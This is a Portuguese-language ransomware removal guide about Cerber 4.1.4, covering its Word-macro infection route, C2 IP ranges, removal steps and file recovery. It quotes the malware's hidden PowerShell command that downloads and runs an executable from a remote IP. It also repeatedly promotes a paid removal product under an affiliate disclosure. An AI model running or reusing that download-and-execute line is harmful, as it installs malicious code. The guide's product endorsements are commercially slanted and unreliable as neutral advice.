Vírus ransomware Cerber 4.1.4. Como remover ? (Guia de desinstalação)

Julie Splinters de escrito por... - - | Digite: Ransomware
12

O terror continua: o Cerber 4.1.4 foi lançado

O Cerber 4.1.4 é a nova sequela da campanha cibernética do Cerber. Parece que passou menos de uma semana desde que os hackers atacaram a comunidade virtual com o Cerber 4.1.0 e o Cerber 4.1.1. Talvez o tenham tomado como um ataque fraco e, consequentemente, reforçaram-no com outro ransomware da mesma série. Continua a moda de anexar extensões de caracteres aleatórios. A última versão rouba algumas dicas ao ransomware Locky pois mudou a sua ativação para uma semelhante ao mencionado malware encriptador de ficheiros. Especificamente, o Cerber 4.1.4 emprega um documento Word e pede para permitir definições macro para descarregar o seu principal executável. No entanto, esta técnica, que tem sido continuamente usada pelo Locky, foi já largamente discutida por especialistas IT. Assim sendo, utilizadores que seguem as tendências do mundo IT poderão escapar a esta ameaça cibernética. Se o malware se abateu sobre si, apesar de tudo, não precisa de entrar em pânico. Primeiro, necessitará de remover o Cerber 4.1.4  do dispositivo. Use o Reimage para acelerar.

A mais recente versão do ransomware continua a causar destruição por todo o mundo. Tal como nas versões 4.1.0 e 4.1.1, começou a empregar a técnica de utilização de endereço IP para enviar pacotes UDP para o seu servidor de Comando & Controlo remoto. Agora, a última versão começou a usar três conjuntos de endereços IP, 5.55.50.0/27, 192.42.118.0/27, 194.165.16.0/22, para transferir a informação técnica ao servidor. Esta particularidade permite aos hackers recolher mais informação crucial sobre os dispositivos das suas vítimas e sistemas operativos. Escusado será dizer que esta informação inspira os vilões cibernéticos a melhorar as suas estratégias de pirataria.

Cerber 4.1.4 rampages ruthlessly

A principal particularidade desta nova versão é a forma como o malware Cerber 4.1.4 lança o seu ataque desastroso. Embora diferentes versões do vírus encriptador de ficheiros tenha já empregado mensagens de e-mail e notificações de voz falsas para atacar sistemas de utilizadores, esta edição mudou para a estratégia de permissão de macros. Quando uma vítima abre o ficheiro .doc recebido, irá visualizar o documento MS Word realçado (pop-up). Contém uma linha de caracteres e códigos aleatórios. Felizmente, as últimas versões do Word desativam as definições de macro por defeito. Assim, ser-lhe-á pedido para permiti-las. Depois, quando modificadas as definições, o ransomware Cerber 4.1.4 irá correr o PowerShell. Dentro de segundos, o tipo de linha base64 irá proceder com a sua ativação. Mais tarde, termina com esta linha.

POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile(‘http://94.102.58.30/~trevor/winx64.exe’,”$env:APPDATA\winx64.exe”);Start-Process (“$env:APPDATA\winx64.exe”)

Como pode ver, tal comando foi efetuado para descarregar e executar o seu principal elemento de execução: win64.exe. Em caso de estar a correr o sistema 32-bit Windows; o seguinte executável poderá ser o win32.exe. Agora o vírus precisa de colocar o ficheiro na pasta %AppData% para alcançar a sua total eficiência. Como habitualmente, enquanto o vírus encripta os ficheiros, poderá notar no ficheiro Readme.hta no seu ambiente de trabalho. Quando o processo de codificação estiver completo, a sua fotografia de fundo é alterada para uma nota de resgate declarando o sequestro pelo Cerber 4.1.4. Ao empregar o valor MachineGuid, localizado na pasta HKLM\Software\Microsoft\Cryptography no computador da vítima, gera uma extensão random. Não perda tempo e prossiga com a remoção do Cerber 4.1.4.

Particularidades da distribuição

O vírus prefere usar a estratégia verificada para propagação: mensagens spam. Embora os utilizadores sejam continuamente avisados para não abrir descuidadamente faturas, formulários oficiais ou alertas policiais recebidos de remetentes desconhecidos, o número de utilizadores afetados permanece ainda elevado. Os criminosos cibernéticos poliram técnicas de persuadir os utilizadores visados a agir de acordo com o seu cenário. Todavia, se vir uma mensagem recebida do escritório do FBI ou instituição financeira, verifique o remetente antes de abrir quaisquer anexos. Poderá verificar a gramática, erros de estilo ou de digitação. A ausência de um logotipo apropriado ou credencial de um representante poderão também avisar sobre um e-mail específico.

É possível exterminar o vírus completamente?

Relativamente à remoção do Cerber 4.1.4, recomendamos que instale software de segurança confiável. Atualize-o após a instalação e inicie o scan. Programas anti-spyware, como o Reimage ou Malwarebytes Anti Malware, normalmente removem o vírus Cerber 4.1.4 dentro de alguns minutos. Porém, se espera que desencriptem os ficheiros, poderá ficar desapontado. Existem outros métodos de fazê-lo embora os mais eficientes para recuperar os ficheiros sejam cópias de segurança ou desencriptador original. Em relação a isto, leia mais para informar-se sobre as nossas recomendações de recuperação de dados. Se o vírus bloqueou o seu ecrã ou não consegue correr funções de sistema básicas, aqui estão as diretrizes sobre como recuperar o acesso.

Nós pode ser ligados com qualquer produto que recomendamos no site. Divulgação em nosso acordo de utilização completa. Ao baixar qualquer software Anti-spyware fornecido para remover Vírus ransomware Cerber 4.1.4 concorda com a nossa Política de privacidade e acordo de utilização..
faça agora!
Baixe
Reimage (software de remoção) Felicidade
garantida
Baixe
Reimage (software de remoção) Felicidade
garantida
Compatível com Microsoft Windows Compatível com OS X
O que fazer se falhou?
Se falhou na remoção da infeção utilizando o Reimage, submeta uma questão à nossa equipa de apoio e providencie o maior número de detalhes possível.
Reimage é recomendada para desinstalar o Vírus ransomware Cerber 4.1.4. Scanner gratuito permite que você verifique se o seu PC está infectado ou não. Se você precisar remover malwares, você tem que comprar a versão licenciada do Reimage ferramenta remoção de malware.

Mais informações sobre esse programa podem ser encontradas em Reimage revisão.

Mais informações sobre esse programa podem ser encontradas em Reimage revisão.
Impressões de em Reimage
Impressões de em Reimage

Guia de remoção manual de virus Cerber 4.1.4:

remover Cerber 4.1.4 usando Safe Mode with Networking

Reimage é uma ferramenta para detectar o malware.
Você vai precisar para comprar versão completa para remover as infecções.
Mais informações sobre Reimage.

  • Passo 1: Reinicie seu computador para Safe Mode with Networking

    Windows 7 / Vista / XP
    1. Clique em Start Shutdown Restart OK.
    2. Quando o computador se torna ativo, começar a carregar F8 várias vezes até que você veja o Advanced Boot Options janela.
    3. Selecionar Safe Mode with Networking da lista Selecionar 'Safe Mode with Networking'

    Windows 10 / Windows 8
    1. Pressione a Power botão no Windows tela de login. Agora, prima e mantenha premido Shift, que está no seu teclado e clique em Restart..
    2. Agora você pode selecionar Troubleshoot Advanced options Startup Settings e finalmente pressione Restart.
    3. quando o computador se torna ativo, selecione Enable Safe Mode with Networking de Startup Settings janela. Selecionar 'Enable Safe Mode with Networking'
  • Passo 2: Removendo o Cerber 4.1.4

    Efetuar login em sua conta e infectados inicie o navegador. Download Reimage ou outras legítimas programa anti-spyware. Atualize-o antes de uma varredura completa do sistema e remover arquivos mal-intencionados que pertencem ao seu ransomware e completa Cerber 4.1.4 extracção.

Se o ransomware é bloquear Safe Mode with Networking, tente outro método.

remover Cerber 4.1.4 usando System Restore

Reimage é uma ferramenta para detectar o malware.
Você vai precisar para comprar versão completa para remover as infecções.
Mais informações sobre Reimage.

  • Passo 1: Reinicie seu computador para Safe Mode with Command Prompt

    Windows 7 / Vista / XP
    1. Clique em Start Shutdown Restart OK.
    2. Quando o computador se torna ativo, começar a carregar F8 várias vezes até que você veja o Advanced Boot Options janela.
    3. Selecionar Command Prompt da lista Selecionar 'Safe Mode with Command Prompt'

    Windows 10 / Windows 8
    1. Pressione a Power botão no Windows tela de login. Agora, prima e mantenha premido Shift, que está no seu teclado e clique em Restart..
    2. Agora você pode selecionar Troubleshoot Advanced options Startup Settings e finalmente pressione Restart.
    3. quando o computador se torna ativo, selecione Enable Safe Mode with Command Prompt de Startup Settings janela. Selecionar 'Enable Safe Mode with Command Prompt'
  • Passo 2: Restaurar os arquivos e configurações de sistema
    1. Uma vez que a Command Prompt janela mostra, digite cd restore e clique em Enter. Digite 'cd restore' sem aspas e pressione 'Enter'
    2. Agora digite rstrui.exe e pressione Enter novamente.. Digite 'rstrui.exe' sem aspas e pressione 'Enter'
    3. Quando uma nova janela aparece, clique em Next e selecione o ponto de restauração que é antes da infiltração de Cerber 4.1.4. Após fazer isso, clique em Next. Quando 'System Restore' janela mostra, selecionar 'Next' Selecione seu ponto de restauração e clique em 'Next'
    4. Agora clique em Yes para iniciar restauração do sistema. Clique em 'Yes' e iniciar restauração do sistema
    Depois de restaurar o seu sistema para uma data anterior, faça o download e analise o seu computador com Reimage e certifique-se de que Cerber 4.1.4 a remoção é realizada com sucesso.

Bonus: Recuperar os seus dados

O guia acima tem como objectivo remover Cerber 4.1.4 do seu computador. Para recuperar files encriptados, siga este guia preparado por semvirus.pt especialistas de segurança

Se os seus ficheiros estão encriptados por Cerber 4.1.4, pode usar diversos metodos para os recuperar

Quão eficaz é o Data Recovery Pro?

Esta aplicação poderá ser a sua única esperança de recuperar pelo menos uma porção da informação codificada até que os investigadores de vírus publiquem uma ferramenta de desencriptação. Alternativamente, é uma aplicação prática que localiza ficheiros perdidos e recupera os danificados.

  • Download Data Recovery Pro (http://semvirus.pt/download/data-recovery-pro-setup.exe);
  • Siga os passos do setup de Data Recovery e instale este programa no seu computador
  • Execute e verifique o seu computador para encontrar os ficheiros encriptadas por Cerber 4.1.4 ransomware;
  • Repare-os

A função Windows Previous Version é uma alternativa?

Apesar da destrutividade deste ransomware, poderá ter uma hipótese de recuperar alguns dos seus ficheiros seguindo os seguintes passos. Note que a recuperação de Sistema deverá ser permitida para que esta função tenha efeito.

  • Encontre o ficheiro encriptado que precisa e clique com o butão direito do rato para o reparar
  • Selecione “Properties” e va para o separador “Previous versions”
  • Aqui, verifique as copias disponiveis do ficheiro em “Folder versions”. Deve selecionar a versao que quer reparar e clique “Restore”.

Por último, você deve sempre pensar sobre a protecção de crypto-ransomwares. A fim de proteger o seu computador a partir de Cerber 4.1.4 e outros ransomwares, use um anti-spyware respeitável, como Reimage, Plumbytes Anti-MalwareWebroot SecureAnywhere AntiVirus ou Malwarebytes Anti Malware

Sobre o autor

Julie Splinters
Julie Splinters

Se este guia de remoção livre ajudou você e você está satisfeito com o nosso serviço, por favor, considere fazer uma doação para manter este serviço vivo. Mesmo uma quantidade menor será apreciada.

Mais informação sobre o autor

Guias de remoção em outras línguas